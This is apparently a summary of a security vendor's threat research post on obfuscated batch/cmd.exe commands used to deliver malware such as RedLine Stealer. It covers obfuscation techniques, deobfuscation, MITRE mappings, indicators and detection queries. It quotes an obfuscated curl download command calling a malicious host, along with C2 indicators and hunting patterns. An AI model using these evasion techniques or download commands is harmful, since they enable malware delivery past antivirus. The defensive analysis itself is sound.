Securonix Threat Research Knowledge Sharing Series: Batch (DOS) Obfuscation or DOSfuscation: Why It’s on the Rise, and How Attackers are Hiding in Obscurity

Securonix Threat Labs describes a growing trend of “DOSfuscation” where threat actors hide malicious payloads inside obfuscated batch/DOS commands—often delivered via .lnk shortcuts—to evade AMSI and antivirus detections. The post details common obfuscation techniques (string splitting, variable substitution, index extraction, encoding changes), deobfuscation approaches, and detection recommendations. #RedLineStealer #Villain

Keypoints

Batch/DOS obfuscation (DOSfuscation) is rising as attackers shift from Office macros to .lnk/.cmd delivery paths after macros were disabled by default.
cmd.exe is favored because AMSI does not natively inspect batch scripts, reducing the chance of AV/EDR detection at initial execution.
Common obfuscation techniques include string splitting (escape chars/quotes), variable substitution, variable index extraction, and encoding manipulation (e.g., UTF-16LE).
Real-world families using these methods include RedLine Stealer, BatCloak, Villain/Hoaxshell, OCX#HARVESTER, Trickbot, and others listed in the article.
Deobfuscation strategies vary by technique: simple find/replace for split strings, variable resolution or redirected echo for substitutions, manual variable/index reconstruction for index extraction, and re-encoding (UTF-16LE→UTF-8) for encoding manipulation.
Detection recommendations: enable command-line/process logging (Event ID 4688), deploy Sysmon, and use targeted hunting queries to spot obfuscated cmd.exe invocations and delayed-expansion patterns.

MITRE Techniques

[T1027] Obfuscated Files or Information – Used to hide batch commands and payload URLs inside obfuscated cmd.exe command lines (‘/c set c=cu7rl –s7sl-no-rev7oke -s -d “id=VzXdED&Prog=2_Mal_vbs.txt&WH=The-global-.pdf” -X PO7ST hxxps://east-healthy-dress.glitch[.]me/Down -o %temp%down.v7bs’)
[T1027.010] Command Obfuscation – Specific command-line manipulation techniques (string splitting, caret escapes, quoted fragments) to evade signatures (‘wh^oam^i’ and use of ‘^’ inside commands)
[T1140] Deobfuscate/Decode Files or Information – Attackers encode payloads (e.g., UTF-16LE) that must be decoded to reveal executable commands (‘encoded RedLine Stealer payload’ requiring re-encoding back to UTF-8)
[T1059] Command and Scripting Interpreter – Batch files and cmd.exe are used as the interpreter for execution of obfuscated commands (shortcuts linking to cmd.exe with appended obfuscated code) (‘cmd.exe linked shortcut would contain obfuscated batch code’)
[T1059.003] Windows Command Shell – Use of Windows command shell features (delayed expansion /v:on, variable substring extraction %var:~start,len%) to reconstruct commands at runtime (‘%variable:~start_index_num,end_index_num%’ used to extract characters)

Indicators of Compromise

[Domain/URL] C2 and download hosts – hxxps://east-healthy-dress.glitch[.]me/Down, hxxps://convertmast[.]com/bldd (and 1 more domain)
[IP address] Host delivery examples – 95.179.201[.]171 (observed in concatenated C2 string)
[File names] Payload/executable names – bud.exe, bud2.exe, down.v7bs (temporary/downloaded payloads)
[File extensions / artifacts] Delivery and script files – .lnk shortcuts used to invoke cmd.exe, .bat batch files (e.g., 3.bat), .v7bs/.vbs downloader stubs
[Command patterns] Obfuscated command-line patterns – use of ‘/v:on’, ‘for /L %’, ‘!!’, and split/set patterns (useful for hunting queries)

Attackers increasingly place obfuscated batch code into .lnk shortcuts so cmd.exe becomes the initial interpreter; this bypasses AMSI which does not inspect traditional batch files. Common obfuscation techniques documented include simple string splitting (inserting carets ^ or mismatched quotes to break signature matches), variable substitution (defining many set variables and concatenating them with %var% or delayed expansion !var!), indexed character extraction (%var:~start,len%) to build commands from long strings, and encoding manipulation (storing the script in UTF-16LE or other encodings so it appears as gibberish until re-encoded).

Deobfuscation approaches map to each method: remove escape characters or quotes with a find/replace for split strings; map and replace variable definitions or redirect execution to echo the assembled command rather than executing it for substitution-based obfuscation; for index extraction, recreate the original variables in a controlled shell and use echo to print resolved substrings; and for encoding tricks simply re-encode the file back to UTF-8 (e.g., with CyberChef or simple Python/batch scripts) to restore readability. Practical examples in the analysis include an OCX#HARVESTER string that resolves to http://95.179.201[.]171/robots.php and a RedLine payload that reconstructs curl download-and-start commands for bud.exe/bud2.exe.

For detection, capture full process creation with command-line (Event ID 4688) and deploy Sysmon to log process activity; hunt for cmd.exe process starts containing patterns like ‘/v:on’, ‘for /L %’, ‘!!’, ‘set ‘ with suspicious spacing or caret characters, and monitor .lnk file executions originating from user folders or extracted archives. The article includes example Securonix hunting queries and provisional detections that search for caret-split tokens, delayed expansion flags, and repeated set/echo constructs as high-value indicators of DOSfuscation activity.